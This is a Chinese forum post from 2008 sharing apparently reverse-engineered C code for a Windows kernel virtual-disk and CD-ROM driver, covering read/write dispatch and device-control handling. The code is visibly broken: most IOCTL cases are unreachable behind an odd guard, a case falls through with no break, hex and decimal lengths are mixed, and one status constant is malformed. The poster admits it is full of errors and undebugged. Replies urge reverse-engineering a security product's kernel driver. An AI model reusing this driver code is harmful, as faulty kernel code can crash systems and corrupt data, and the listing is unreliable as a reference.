// first use, completes zero-length requests with success, and otherwise queues the IRP for the
// device's worker thread (system_thread_routine) and returns STATUS_PENDING.
NTSTATUS DispatchReadWrite(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp){
PDEVICE_EXTENSION dev_ext= DeviceObject->DeviceExtension;
PIO_STACK_LOCATION isl;
if(!dev_ext->media)
{
goto end_here;
return 0;   // unreachable
}
// Lazy resolution of the physical drive; both globals are filled in by GetPhysicalDriveObject.
if(!physdriv_do)
if(GetPhysicalDriveObject(&physdriv_do,&physdriv_fo))
{Irp->IoStatus.Status=STATUS_NO_MEDIA_IN_DEVICE;
goto end_here;
return 0;   // unreachable
}
isl=IoGetCurrentIrpStackLocation(Irp);
if(isl->Parameters.Read.Length==0){
Irp->IoStatus.Status=0;
goto end_here;
}
// Equivalent of IoMarkIrpPending, done on the stack location directly.
isl->Control|=SL_PENDING_RETURNED;
// Queued on Tail.Overlay.ListEntry; system_thread_routine recovers the IRP with CONTAINING_RECORD.
ExInterlockedInsertTailList(&dev_ext->mylist,&Irp->Tail.Overlay.ListEntry,&dev_ext->spinlock);
KeSetEvent(&dev_ext->event,0,0);
return STATUS_PENDING;
end_here:
Irp->IoStatus.Information=0;
IoCompleteRequest(Irp,0);
return 0;
}
NTSTATUS DispatchDeviceControl(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp){
PDEVICE_EXTENSION dev_ext;
PIO_STACK_LOCATION isl;
PVOID inputbuffer;
NTSTATUS status;
isl=IoGetCurrentIrpStackLocation(Irp);
dev_ext=DeviceObject->DeviceExtension;
if(dev_ext->media)
{if(isl->Parameters.DeviceIoControl.IoControlCode==0x8000F800){
switch(isl->Parameters.DeviceIoControl.IoControlCode)
{
case IOCTL_DISK_GET_CACHE_INFORMATION:
if(isl->Parameters.DeviceIoControl.OutputBufferLength<0x18)
{
status=STATUS_INVALID_PARAMETER;
Irp->IoStatus.Information=0;
}
else{
PDISK_CACHE_INFORMATION disk_cache=(PDISK_CACHE_INFORMATION )Irp->AssociatedIrp.SystemBuffer;
disk_cache->ParametersSavable=0;
disk_cache->ReadCacheEnabled=0;
disk_cache->WriteCacheEnabled=0;
status=0;
Irp->IoStatus.Information=0x18;
}
break;
case IOCTL_DISK_VERIFY:
if(isl->Parameters.DeviceIoControl.InputBufferLength>0x10)
{PVERIFY_INFORMATION verify=(PVERIFY_INFORMATION)Irp->AssociatedIrp.SystemBuffer;
Irp->IoStatus.Information=verify->Length;
status=0;
}
else
{status= STATUS_INVALID_PARAMETER;
Irp->IoStatus.Information=0;
}
break;
case IOCTL_CDROM_READ_TOC:
if(isl->Parameters.DeviceIoControl.InputBufferLength>0x324)
{PCDROM_TOC toc=(PCDROM_TOC )Irp->AssociatedIrp.SystemBuffer;
RtlZeroMemory(toc, sizeof(CDROM_TOC));
toc->FirstTrack=1;
toc->LastTrack=1;
toc->TrackData->Control&=0xF0;
toc->TrackData->Control|=0x04;
status=0;
Irp->IoStatus.Information=324;
}
else
{status= STATUS_BUFFER_TOO_SMALL;
Irp->IoStatus.Information=0;
}
break;
case IOCTL_DISK_GET_DRIVE_GEOMETRY:
case IOCTL_CDROM_GET_DRIVE_GEOMETRY:
if(isl->Parameters.DeviceIoControl.OutputBufferLength>0x18){
PDISK_GEOMETRY geometry=(PDISK_GEOMETRY)Irp->AssociatedIrp.SystemBuffer;
LARGE_INTEGER partitionsectorcount;
partitionsectorcount.LowPart=dev_ext->diskstruct->disksize.HighPart;
partitionsectorcount.HighPart=0;
partitionsectorcount.QuadPart=partitionsectorcount.QuadPart<<9;
geometry->Cylinders.QuadPart = partitionsectorcount.QuadPart/ 0x10000;
geometry->MediaType = FixedMedia;
geometry->TracksPerCylinder = 0x10;
geometry->SectorsPerTrack = 0x08;
geometry->BytesPerSector = 512;
status=0;
Irp->IoStatus.Information=18;
}
else
{status= STATUS_BUFFER_TOO_SMALL;
Irp->IoStatus.Information=0;
}
case IOCTL_DISK_SET_PARTITION_INFO:
if(isl->Parameters.DeviceIoControl.InputBufferLength<1 ){
status=0x0C000000D;
Irp->IoStatus.Information=0;
}
else
{
status=0;
Irp->IoStatus.Information=0;
}
break;
case IOCTL_STORAGE_MEDIA_REMOVAL:
case IOCTL_DISK_MEDIA_REMOVAL:
case IOCTL_STORAGE_CHECK_VERIFY2:
case IOCTL_DISK_CHECK_VERIFY:
case IOCTL_STORAGE_CHECK_VERIFY:
case IOCTL_CDROM_CHECK_VERIFY:
status=0;
Irp->IoStatus.Information=0;
break;
case IOCTL_DISK_IS_WRITABLE:
status=0;
Irp->IoStatus.Status=0;
Irp->IoStatus.Information=0;
break;
附件里继续。。。
[/code]
[[i] 本帖最后由 eros412 于 2008-4-1 15:13 编辑 [/i]] 有精力的话逆下360的 SafeBoxKrnl.sys啊
有些地方还是很猥亵的:loveliness: *** 作者被禁止或删除 内容自动屏蔽 *** 这个代码错误很多,没时间修改、调试
[[i] 本帖最后由 eros412 于 2008-8-23 21:59 编辑 [/i]]